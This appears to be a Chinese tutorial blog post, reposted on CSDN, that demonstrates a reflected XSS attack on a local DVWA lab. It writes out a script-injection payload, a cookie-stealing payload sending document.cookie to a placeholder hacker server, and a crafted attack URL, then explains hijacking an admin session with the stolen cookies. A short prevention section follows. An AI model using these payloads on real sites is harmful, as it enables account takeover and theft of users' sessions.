XSS攻击过程

最新推荐文章于 2024-06-24 22:16:50 发布
最新推荐文章于 2024-06-24 22:16:50 发布
阅读量1.2k 收藏 5
点赞数
文章标签: php
原文链接:http://www.cnblogs.com/nianyuxue/p/7803577.html
版权

大多数人对于XSS的原理有一个基本认识,这里不再重复,只给出一个能够演示其原理的完整样例。

1 角色分配

  • 有XXS漏洞的网站,IP地址http://127.0.0.1/dvwa/DVWA-master,PHP为开发语言
  • 受害访问者,浏览器为IE11
  • 黑客的数据接收网站,IP地址http://127.0.0.1/xsser/index.php,xsser.me平台

 

2 源码实例

2.1 漏洞网站

 

该网页把用户通过GET发送过来的表单数据,未经处理直接写入返回的html流,这就是XSS漏洞所在(输入被写入html代码中并且返回展示);

比如在输入框中输入:<script src=http://127.0.0.1/xsser/HS8WzU></script>,点击提交,就把这样一段脚本注入到html中了;

网页的html脚本就变成了:

 

2.2 攻击方法
在输入框中输入如下攻击语句并提交:<script src=http://127.0.0.1/xsser/HS8WzU></script>

上面的src填写的接受地址,是由XSS平台生成(黑客接受网址):

 

PS:

如果是使用一个脚本来获取xss攻击的猎物,攻击语句为:

 "/> <script>window.open("http://黑客攻击平台的IP/xss_hacker.php?cookie="+document.cookie);</script><!--  

这里xss_hacker.php是攻击文件,放到攻击者黑客的网站服务器下。获取来的cookies写入到xss_hacker.php脚本中设置的txt文件中。

 

2.3 生成的url

最终生成的攻击URL为:

 http://127.0.0.1/dvwa/DVWA-master/vulnerabilities/xss_r/?name=%3Cscript+src%3Dhttp%3A%2F%2F127.0.0.1%2Fxsser%2FHS8WzU%3E%3C%2Fscript%3E#

接下来要做的就是,寻找受害人,诱惑其点击上述URL;当有受害人点击了这个url就执行了html中的脚本将cookies返给黑客。

明显看出,这个html会去执行一个脚本,这个脚本功能是把用户的cookie发送到黑客的接收网站

 

2.4 获取猎物

xss平台的得到的cookie,如下:

黑客获取cookies之后使用特定的浏览器或者工具,访问论坛,并带着获取的cookies,就可以不用登陆即可以管理员账户登录论坛。(正常的浏览器不能伪造cookies除非使用插件)

 

备注:

对于一些论坛网站,黑客通过提交帖子往html中注入获取cookies的脚本,当管理员或者其他人点击帖子的时候,就执行了该脚本,获取管理员cookies,并且将cookies发送到黑客的网址。黑客获取cookies之后使用特定的浏览器或者工具,访问论坛,并带着获取的cookies,就可以不用登陆即可以管理员账户登录论坛。(正常的浏览器不能伪造cookies除非使用插件)

 

 

 

3 攻击流程:
1、黑客可以通过各种扫描工具或者人工输入来找到有XSS漏洞的网站URL

2、构造攻击字符串

3、确定获取猎物的方式(xss平台或者自己写的脚本)

4、执行攻击

5、获取猎物:cookies或者用户名密码

6、利用获取的敏感数据做坏事(可以使用获取的cookies访问网址,不需要输入密码)。

 

4 XSS的预防

XSS的预防可以从多方面着手:

(1)如前面所述,浏览器自身可以识别简单的XSS攻击字符串,从而阻止简单的XSS攻击;

(2)从根本上说,解决办法是消除网站的XSS漏洞,这就需要网站开发者运用转义安全字符等手段,始终把安全放在心上;

(3)对于普通网民,需要注意尽量抵挡诱惑,别去点击非知名网站的链接。

 

转载于:https://www.cnblogs.com/nianyuxue/p/7803577.html

林尧彬
关注
  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
反射/存储/DOM型XSS攻击原理及攻击流程详解
G3et的博客
01-02 1975
XSS(跨站脚本攻击)是一种常见的 Web 安全漏洞,其允许攻击者在恶意用户的浏览器中执行脚本。这可能导致数据泄露、控制用户浏览器或执行其他恶意操作。 XSS 攻击通常利用网页的客户端代码(通常是 HTML 或 JavaScript)来执行。攻击者可能会向网页中插入恶意的 HTML 元素或 JavaScript 代码,试图欺骗浏览器执行攻击者的脚本。
xss漏洞攻击试验流程1
weixin_44689834的博客
05-28 1392
1.XSS攻击原理 XSS原称为CSS(Cross-Site Scripting),因为和层叠样式表(Cascading Style Sheets)重名,所以改称为XSS(X一般有未知的含义,还有扩展的含义)。XSS攻击涉及到三方:攻击者,用户,web server。用户是通过浏览器来访问web server上的网页,XSS攻击就是攻击者通过各种办法,在用户访问的网页中插入自己的脚本,让其在用户访问网页时在其浏览器中进行执行。攻击者通过插入的脚本的执行,来获得用户的信息,比如cookie,发送到攻击者自己的
XSS攻击
qq_56486005的博客
10-05 3892
一、Cross Site Scripting 原理: 攻击者向Web页面里插入恶意Script代码,当用户浏览该页面时,,嵌入到Script的代码被执行,达到恶意攻击的目的。 分类: 1.发送连接。 2.用户点击恶意连接。 3.网站将XSS同正常的网页返回到用户的浏览器。 4.用户的浏览器解析了网页中的恶意代码,向恶意服务器发起请求。 5.黑客从自己搭建的恶意服务器获取用户的相关信息。 需要欺骗用户自己去点击恶意连接才能触发XSS代码。大多时用来盗用cookie的。非持久化。 1.黑客在目标服务器上构造
XSS(跨站脚本攻击)漏洞解析(带靶场演示)
最新发布
wudideaqing的博客
06-24 2041
XSS(跨站脚本攻击,全称Cross-Site Scripting)是一种常见网络安全漏洞,允许攻击者在用户浏览器中执行恶意脚本。攻击者通过在受信任网站中注入恶意代码,诱骗用户点击或加载恶意内容,从而窃取数据、篡改页面或劫持用户。
XSS攻击详解
wanqianshao的博客
12-15 4909
一.xss攻击简介 1.OWASP TOP 10 之一,XSS被称为跨站脚本攻击(Cross-site-scripting) 2.主要基于java script 完成恶意攻击行为。JS可以非常灵活的操作html、css和浏览器,这使得XSS攻击的想象空间特别大。 3.XSS通过将精心构造代码JS注入到网页中,并由浏览器解释运行这段代码,以达到恶意攻击的效果。当用户访问被XSS脚本注入的网页,XSS脚本就会被提取出来。用户浏览器就会解析这段XSS代码,也就是说用户被攻击了。 4.微博,留言板,聊天室等等收集用
信息安全二 XSS攻击
小灰的博客
02-28 964
一、概述 ​ XSS是一种发生在前端浏览器端的漏洞,所以其危害的对象也是前端用户。形成XSS漏洞的主要原因是程序对输入和输出没有做合适的处理,导致“精心构造”的字符输出在前端时被浏览器当作有效代码解析执行从而产生危害。一般XSS可以分为如下几种常见类型: ​ 1.反射性XSS; ​ 2.存储型XSS; ​ 3.DOM型XSS; 二、环境 靶场:Pikachu 浏览器:火狐 三、反射型 交互的数据一般不会被存放在数据库里,一次性,所见即所得,一般出现在查询类页面等。 1.首先输入一些特殊字符
xss攻击详解
剁椒鱼头没剁椒的博客
11-15 8671
XSS攻击通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序。这些恶意网页程序通常是JavaScript,但实际上也可以包括Java、 VBScript、ActiveX、 Flash 或者甚至是普通的HTML。攻击成功后,攻击者可能得到包括但不限于更高的权限(如执行一些操作)、私密网页内容、会话和cookie等各种内容。
网络安全之xss攻击过程及解析
为安全而生,分享各类网络攻击及其应对方法
12-07 1200
在任何时候用户的输入都是不可信的。对于 HTTP 参数,理论上都要进行验证,例如某个字段是枚举类型,其就不应该出现枚举以为的值;对于不可信数据的输出要进行相应的编码;此外 httpOnly、 CSP、 X-XSS-Protection、 Secure Cookie等也可以起到有效的防护。
web安全之XSS攻击及防御pdf
08-25
</script>`,那么这个脚本将在其他用户的浏览器中执行,展示了一个简单的XSS攻击过程。 #### 二、XSS的分类 ##### 2.1 反射型XSS 反射型XSS是最常见的一类XSS攻击方式,它通过将恶意脚本作为URL的一部分发送给Web...
springmvc4配置防止XSS攻击的方法
04-05
XSS攻击是指攻击者通过在网页中嵌入恶意脚本代码,当其他用户浏览该网页时,恶意代码会执行,导致用户信息泄露、网站内容篡改等问题。而SQL注入攻击则是通过在Web应用的数据库查询接口输入恶意的SQL语句,以达到控制...
Web安全之XSS攻击与防御小结
02-23
攻击者对含有漏洞的服务器发起XSS攻击(注入JS代码)。诱使受害者打开受到攻击的服务器URL。受害者在Web浏览器中打开URL,恶意脚本执行。(1)反射型:发出请求时,XSS代码出现在URL中,作为输入提交到服务器端,...
xss攻击方法简单介绍了解
less_cold的博客
09-18 563
xss是指跨站脚本攻击。就是指将脚本(不限于script)注入到该网站中,从而达到自己的目的。 例如向输入框中输入alert("hello");这样将script注入进去。 所有有输入的地方,如果没有对输入数据进行处理,都会存在xss漏洞。 基于dom的xss攻击,比如获取别人的cookie信息。所以还是不要点开奇奇怪怪的网站和链接的好。 将script脚本写在链接里,从而获取你的
浅析XSS跨站脚本攻击
SalmonellaVaccine的专栏
10-29 1790
本文固定链接: http://www.bravelee.net/?p=241 | Bravelee's Blog 目 录 第1章     XSS概述... 1 1.1   XSS定义... 1 1.2   XSS危害... 1 1.3   XSS攻击原理... 1 第2章     XSS攻击类型... 2 2.1   反射型XSS. 2
xss安全测试流程
热门推荐
Breeze的博客
12-11 1万+
xss安全测试流程 1. xss本质 xss产生的本质只有两点,1. 对用户可控的输入内容没有进行有效的过滤;2. 将(没过滤的)用户可控内容输出回前端页面。所以xss的安全测试可以从这两方面入手。 2. 收集xss可能存在的点 由于xss的利用特征,存储型xss危害最大,可以盗取用户cookie,形成蠕虫等;反射型和DOM型主要用于钓鱼。所以在关注上述两点时应遵循以下规律: 用户可控的输入在协...
XSS蠕虫攻击
iteye_4538的博客
09-22 1270
XSS (cross-site scripting),即跨站脚本攻击,它的本质还是一种“HTML注入”,用户的数据被当成了HTML代码一部分来执行,从而混淆了原本的语义,产生了新的语义。 来看一张某网站遭受XSS攻击后的图片, [img]http://dl2.iteye.com/upload/attachment/0101/3717/a83f235a-329f-30b0-9f85-3aa7...
网络攻击-XSS攻击详解
weixin_33971130的博客
08-11 298
特别提示:本人博客部分有参考网络其他博客,但均是本人亲手编写过并验证通过。如发现博客有错误,请及时提出以免误导其他人,谢谢!欢迎转载,但记得标明文章出处:http://www.cnblogs.com/mao2080/ 1、基础概念   XSS(Cross Site Scripting)攻击全称跨站脚本攻击,是为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混...
XSS攻击应急响应策略
预案的主要目的是为了在遭受XSS攻击时,能够迅速响应并降低对业务和客户的影响。 预案目标是确保在发现XSS攻击后,能在最短时间内处理恶意代码,以保护客户和网站业务不受损害。预案适用于恺英网络的所有业务系统和...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值